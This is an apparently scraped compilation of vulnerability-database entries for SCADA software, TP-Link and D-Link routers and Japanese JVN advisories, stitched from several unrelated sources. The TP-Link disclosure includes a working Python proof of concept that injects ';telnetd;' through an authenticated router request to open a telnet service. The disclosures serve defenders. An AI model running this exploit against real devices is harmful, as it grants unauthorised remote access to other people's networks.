Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject.
For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
Produced 2006 by US-CERT, a government organization.
Terms of use: <http://www.us-cert.gov/legal.html>
Revision History
January 11, 2006: Initial release
var-201601-0038 Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2790 IOCTL in the DrawSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath with the Path parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems.
var-201801-0394 TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-Link WVR, WAR and ER devices are different series of router products from China's TP-LINK. Security vulnerabilities exist in TP-Link WVR, WAR, and ER devices. These vulnerabilities can be triggered in LAN and WAN (if the "remote management" function is enabled).
Vulnerability Type:
================
Command Injection (Authenticated)
Product:
================
We have tested these vulnerabilities on TL-WVR450L (the latest version is TL-WVR450L V1.0161125) and TL-WVR900G (TL-WVR900G V3.0_170306). The following models should also be affected, and the vendor has confirmed: TP-Link ER5110G, TP-Link ER5120G, TP-Link ER5510G, TP-Link ER5520G, TP-Link R4149G, TP-Link R4239G, TP-Link R4299G, TP-Link R473GP-AC, TP-Link R473G, TP-Link R473P-AC, TP-Link R473, TP-Link R478G+, TP-Link R478, TP-Link R478+, TP-Link R483G, TP-Link R483, TP-Link R488, TP-Link WAR1300L, TP-Link WAR1750L, TP-Link WAR2600L, TP-Link WAR302, TP-Link WAR450L, TP-Link WAR450, TP-Link WAR458L, TP-Link WAR458, TP-Link WAR900L, TP-Link WVR1300G, TP-Link WVR1300L, TP-Link WVR1750L, TP-Link WVR2600L, TP-Link WVR300, TP-Link WVR302, TP-Link WVR4300L, TP-Link WVR450L, TP-Link WVR450, TP-Link WVR458L, TP-Link WVR900G, TP-Link WVR900L
CVE details:
================
The details of each vulnerability are as follows:
CVE-2017-15613: new-interface variable in the cmxddns.lua file
CVE-2017-15614: new-outif variable in the pptp_client.lua file
CVE-2017-15615: lcpechointerval variable in the pptp_client.lua file
CVE-2017-15616: new-interface variable in the phddns.lua file
CVE-2017-15617: iface variable in the interface_wan.lua file
CVE-2017-15618: new-enable variable in the pptp_client.lua file
CVE-2017-15619: pptphellointerval variable in the pptp_client.lua file
CVE-2017-15620: new-zone variable in the ipmac_import.lua file
CVE-2017-15621: olmode variable in the interface_wan.lua file
CVE-2017-15622: new-mppeencryption variable in the pptp_client.lua file
CVE-2017-15623: new-enable variable in the pptp_server.lua file
CVE-2017-15624: new-authtype variable in the pptp_server.lua file
CVE-2017-15625: new-olmode variable in the pptp_client.lua file
CVE-2017-15626: new-bindif variable in the pptp_server.lua file
CVE-2017-15627: new-pns variable in the pptp_client.lua file
CVE-2017-15628: lcpechointerval variable in the pptp_server.lua file
CVE-2017-15629: new-tunnelname variable in the pptp_client.lua file
CVE-2017-15630: new-remotesubnet variable in the pptp_client.lua file
CVE-2017-15631: new-workmode variable in the pptp_client.lua file
CVE-2017-15632: new-mppeencryption variable in the pptp_server.lua file
CVE-2017-15633: new-ipgroup variable in the session_limits.lua file
CVE-2017-15634: name variable in the wportal.lua file
CVE-2017-15635: max_conn variable in the session_limits.lua file
CVE-2017-15636: new-time variable in the webfilter.lua file
CVE-2017-15637: pptphellointerval variable in the pptp_server.lua file
Credits:
================
chunibalon, puzzor @VARAS of IIE
Timeline:
================
2017.08 to 2017.09: Issues found.
2017.09.26: Vendor contacted.
2017.10.13: Vendor confirmed.
2017.10.14: CVE id requested.
2017.10.19: CVE id assigned.
2018.1: Vendor confirmed that all affected products have been fixed.
Vulnerability detail:
================
These vulnerabilities are caused by a similar reason, so here is an explanation of CVE-2017-15616. Other vulnerabilities can be reproduced with the detailed descriptions of the variable and lua file.
In /usr/lib/lua/luci/controller/admin/phddns.lua file, line 113: *********************************** function add_phddns(http_form) local form_data = json.decode(http_form.data) local jdata = form_data.params.new ret = form:insert(CONFIG_NAME, "phddns", jdata, RULE_KEYS, nil) if not ret then return false, err.ERR_COM_TABLE_ITEM_UCI_ADD end if not uci_r:commit(CONFIG_NAME) then return false, err.ERR_COM_UCI_COMMIT end -- add the ref of interface ifs.update_if_reference(jdata.interface, 1) sys.fork_exec('/etc/init.d/phddns restart') userconfig.cfg_modify() return jdata end *********************************** This file will process a POST request from the web management panel with url "ip/cgi-bin/luci/;stok=xxx/admin/phddns?form=phddns". The interface argument passed by the POST request can be set with the malformed command payload and the lua file didn't check the argument sufficiently. Then the malformed value of "interface" argument causes the command injection vulnerability. PoC file: ================ *********************************** import requests import urllib import json # This is the PoC code of authenticated command injection of TP-Link WVR900G router with the CVE-2017-15616. 
# To reproduce the PoC, the ip of the router should be 192.168.123.1 and the password of web management panel should be 'adminadmin' PASSWORD = 'c6564879eda92681404fb4ce64343788e47d266c490bb9d574f4467644a2f96b73ec157bbffabb50752c46f55d026ec7ef34661d7dcb030b0b1fa527173093ae4358f4740e539322f58c441ea0003978475346fb66320f749cc138f867bc0d8d9501f1613524fbba565979d95df6ef412837dee15a6dd8867d00b91c6f4a3406' BASEURL = 'http://192.168.123.1' LOGINURL = BASEURL + '/cgi-bin/luci/;stok=/login?form=login' MARK = '###' VULURL = BASEURL + '/cgi-bin/luci/;stok=%s/admin/phddns?form=phddns' % (MARK) headers = { "Accept": "application/json, text/javascript, */*; q=0.01", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.6,en;q=0.4", "Connection": "keep-alive", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "Host": BASEURL[7:], "Origin": BASEURL, "Referer": "%s/webpages/login.html" % (BASEURL), "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36", "X-Requested-With": "XMLHttpRequest" } login_data_value = {'method': 'login','params': {'password': PASSWORD,'username': 'admin'}} login_data = {'data':json.dumps(login_data_value)} s = requests.Session() s.headers.update(headers) print (LOGINURL) print (login_data) res = s.post(LOGINURL, data=login_data) stok = eval(res.text)['result']['stok'] print '[*] stok is %s' % (stok) tmp_vul = VULURL.replace(MARK, stok) print '[*] vul_url is %s ' % (tmp_vul) delete_data = {"method":"delete","params":{"key":"key-0","index":"0"}} delete_data = {'data': json.dumps(delete_data)} print '[+] delete existed rule' res = s.post(tmp_vul, data=delete_data) print '[*] response is: %s' % (res.text) # after executing this payload, the router will open its telnetd service. 
payload = ''';telnetd;''' vul_data = {"method":"add","params":{"index":0,"old":"add","new":{"interface":"WAN1%s" % (payload),"name":"test1","passwd":"test","enable":"on"},"key":"add"}} vul_data = {'data': json.dumps(vul_data)} print '[+] sending payload' res = s.post(tmp_vul, data=vul_data) print '[*] response is: %s' % (res.text) *********************************** Reference: ================ https://github.com/chunibalon/Vulnerability/blob/master/CVE-2017-15613_to_CVE-2017-15637.txt
var-201801-0152 An Untrusted Pointer Dereference issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple vulnerabilities that may allow an attacker to cause the program to use an invalid memory address, resulting in a program crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x27ec IOCTL in the webvrpcs process. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A denial of service vulnerability exists in versions prior to Advantech WebAccess 8.3
var-201801-0151 A Stack-based Buffer Overflow issue was discovered in Advantech WebAccess versions prior to 8.3. There are multiple instances of a vulnerability that allows too much data to be written to a location on the stack. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. Authentication is not required to exploit this vulnerability. The specific flaw exists within the parsing of the command line in the bwscrp utility. An attacker can leverage this functionality to execute code under the context of Administrator. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple denial-of-service vulnerabilities 2. Multiple stack-based buffer-overflow vulnerabilities 3. A directory-traversal vulnerability 4. An SQL-injection vulnerability 5. Failed attacks will cause denial of service conditions. Versions prior to Advantech WebAccess 8.3 are vulnerable
var-201902-0647 LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the processing of the MemoryWriteLong method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. Script embedded in a crafted file can create files in arbitrary locations using the Ini.WriteNumber method. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition
var-201906-1029 In WebAccess/SCADA Versions 8.3.5 and prior, multiple untrusted pointer dereference vulnerabilities may allow a remote attacker to execute arbitrary code. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the 0x2776 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a browser-based SCADA software from Advantech, Taiwan. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. This vulnerability stems from improper design or implementation problems in the code development process of network systems or products
var-202007-0395 Advantech iView, versions 5.6 and prior, contains multiple SQL injection vulnerabilities that are vulnerable to the use of an attacker-controlled string in the construction of SQL queries. An attacker could extract user credentials, read or modify information, and remotely execute code. Advantech iView has an SQL injection vulnerability. Information may be obtained or tampered with, and service may be disrupted (DoS). This vulnerability allows remote attackers to disclose sensitive information on affected installations of Advantech iView. Authentication is not required to exploit this vulnerability. The specific flaw exists within the NetworkServlet servlet. The issue results from the lack of proper validation of a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose stored credentials, leading to further compromise. Advantech iView is a device management application provided by Advantech
var-202305-0214 D-Link DIR-2640 HNAP LoginPassword Authentication Bypass Vulnerability. This vulnerability allows network-adjacent attackers to bypass authentication on affected installations of D-Link DIR-2640 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the web management interface, which listens on TCP port 80 by default. A specially crafted login request can cause authentication to succeed without providing proper credentials. An attacker can leverage this vulnerability to bypass authentication on the system. Was ZDI-CAN-19549. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202305-0130 D-Link DIR-2640 EmailFrom Command Injection Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DIR-2640 routers. Although authentication is required to exploit this vulnerability, the existing authentication mechanism can be bypassed. The specific flaw exists within the handling of the EmailFrom parameter provided to the HNAP1 endpoint. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-19550. D-Link DIR-2640 is a high-power Wi-Fi router from China's D-Link
var-202308-4331 D-Link DAP-2622 DDP Firmware Upgrade Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20077. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3186 D-Link DAP-2622 DDP Configuration Backup Server IPv6 Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20066. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3151 D-Link DAP-2622 DDP User Verification Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20053. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3130 D-Link DAP-2622 DDP Configuration Restore Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20069. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3129 D-Link DAP-2622 DDP Set AG Profile Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20079. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3114 D-Link DAP-2622 DDP Reset Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20057. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3113 D-Link DAP-2622 DDP Configuration Backup Server Address Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20067. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3105 D-Link DAP-2622 DDP Reset Factory Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20058. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3456 D-Link DAP-2622 DDP Reboot Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20055. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3426 D-Link DAP-2622 DDP Configuration Backup Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20065. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3391 D-Link DAP-2622 DDP User Verification Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20052. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
var-202308-3319 D-Link DAP-2622 DDP Set SSID List Missing Authentication Vulnerability. This vulnerability allows network-adjacent attackers to make unauthorized changes to device configuration on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of authentication prior to allowing access to functionality. An attacker can leverage this vulnerability to manipulate wireless authentication settings. Was ZDI-CAN-20104. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company. No detailed vulnerability details are currently provided
var-202308-3121 D-Link DAP-2622 DDP Reboot Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20054. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3323 D-Link DAP-2622 DDP Change ID Password Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20060. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3219 D-Link DAP-2622 DDP Change ID Password New Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20063. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3185 D-Link DAP-2622 DDP Configuration Backup Filename Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20068. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3150 D-Link DAP-2622 DDP Change ID Password New Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20062. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3131 D-Link DAP-2622 DDP Reset Factory Auth Password Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20059. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3120 D-Link DAP-2622 DDP Configuration Backup Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20064. D-Link DAP-2622 is a wireless access point device from D-Link, a Chinese company
var-202308-3106 D-Link DAP-2622 DDP Reset Auth Username Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows network-adjacent attackers to execute arbitrary code on affected installations of D-Link DAP-2622 routers. Authentication is not required to exploit this vulnerability. The specific flaw exists within the DDP service. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-20056. D-Link DAP-2622 is a wireless router from D-Link, a Chinese company
Vulnerabilities are sorted by update time (recent to old).
ID Description Publish Date Update Date
jvndb-2024-004595 Multiple vulnerabilities in FutureNet NXR series, VXR series and WXR series 2024-07-29T17:51+09:00 2025-06-30T09:56+09:00
jvndb-2025-000043 Multiple vulnerabilities in iroha Board 2025-06-26T15:13+09:00 2025-06-26T15:13+09:00
jvndb-2025-000044 Denial-of-service (DoS) vulnerabilities in multiple Apache products 2025-06-26T14:41+09:00 2025-06-26T14:41+09:00
jvndb-2025-000042 Inefficient regular expressions in GROWI 2025-06-24T15:25+09:00 2025-06-24T15:25+09:00
jvndb-2025-000041 Multiple vulnerabilities in ELECOM wireless LAN routers 2025-06-24T14:50+09:00 2025-06-24T14:50+09:00
jvndb-2025-007390 Trend Micro Internet Security and Trend Micro Maximum Security vulnerable to link following local privilege escalation (CVE-2025-49384, CVE-2025-49385) 2025-06-24T11:18+09:00 2025-06-24T11:18+09:00
jvndb-2025-000040 KCM3100 vulnerable to authentication bypass using an alternate path or channel 2025-06-18T13:42+09:00 2025-06-18T13:42+09:00
jvndb-2025-000039 Multiple vulnerabilities in RICOH Streamline NX PC Client 2025-06-13T16:09+09:00 2025-06-13T16:09+09:00
jvndb-2025-000038 UpdateNavi vulnerable to improper restriction of communication channel to intended endpoints 2025-06-12T15:56+09:00 2025-06-12T15:56+09:00
jvndb-2025-000037 Multiple surveillance cameras provided by i-PRO Co., Ltd. vulnerable to cross-site request forgery 2025-06-06T13:56+09:00 2025-06-06T13:56+09:00
jvndb-2025-000036 TimeWorks vulnerable to path traversal 2025-06-03T15:35+09:00 2025-06-03T15:35+09:00
jvndb-2025-000035 Improper file access permission settings in PC Time Tracer 2025-06-03T14:40+09:00 2025-06-03T14:40+09:00
jvndb-2025-000034 Multiple vulnerabilities in wivia 5 2025-05-30T15:57+09:00 2025-05-30T15:57+09:00
jvndb-2025-001238 Multiple out-of-bounds write vulnerabilities in Canon Office/Small Office Multifunction Printers and Laser Printers 2025-01-29T13:41+09:00 2025-05-27T16:06+09:00
jvndb-2025-000032 Mailform Pro CGI generating error messages containing sensitive information 2025-05-26T14:22+09:00 2025-05-26T14:22+09:00
jvndb-2025-000033 Improper pattern file validation in i-FILTER optional feature 'Anti-Virus & Sandbox' 2025-05-23T15:36+09:00 2025-05-23T15:36+09:00
jvndb-2025-005467 Passback vulnerabilities in Canon Production Printers, Office/Small Office Multifunction Printers, and Laser Printers 2025-05-22T15:03+09:00 2025-05-22T15:03+09:00
jvndb-2024-000117 Stack-based buffer overflow vulnerability in multiple laser printers and MFPs which implement Ricoh Web Image Monitor 2024-10-31T16:44+09:00 2025-05-19T17:59+09:00
jvndb-2025-005107 Multiple vulnerabilities in V-SFT 2025-05-16T14:32+09:00 2025-05-16T14:32+09:00
jvndb-2025-005057 Multiple vulnerabilities in I-O DATA network attached hard disk 'HDL-T Series' 2025-05-15T18:27+09:00 2025-05-15T18:27+09:00
jvndb-2025-005050 Multiple vulnerabilities in a-blog cms 2025-05-15T18:11+09:00 2025-05-15T18:11+09:00
jvndb-2025-000031 Pgpool-II vulnerable to authentication bypass by primary weakness 2025-05-15T16:14+09:00 2025-05-15T16:14+09:00
jvndb-2025-004863 Panasonic IR Control Hub vulnerable to Unauthorised firmware loading 2025-05-14T11:30+09:00 2025-05-14T11:30+09:00
jvndb-2025-004671 Multiple vulnerabilities in GL-MT2500 and GL-MT2500A 2025-05-12T17:52+09:00 2025-05-12T17:52+09:00
jvndb-2025-001016 OMRON NJ/NX series vulnerable to path traversal 2025-02-06T18:27+09:00 2025-05-08T17:44+09:00
jvndb-2025-004079 Improper access permission settings in multiple SEIKO EPSON printer drivers for Windows OS 2025-04-30T11:46+09:00 2025-04-30T11:46+09:00
jvndb-2025-004076 Security Update for Trend Micro Trend Vision One (April 2025) 2025-04-30T10:38+09:00 2025-04-30T10:38+09:00
jvndb-2025-000029 Multiple vulnerabilities in Quick Agent 2025-04-25T13:49+09:00 2025-04-25T13:49+09:00
jvndb-2025-000028 i-PRO Configuration Tool vulnerable to use of hard-coded cryptographic key 2025-04-24T13:50+09:00 2025-04-24T13:50+09:00
jvndb-2025-000027 Active! mail vulnerable to stack-based buffer overflow 2025-04-18T16:50+09:00 2025-04-18T16:50+09:00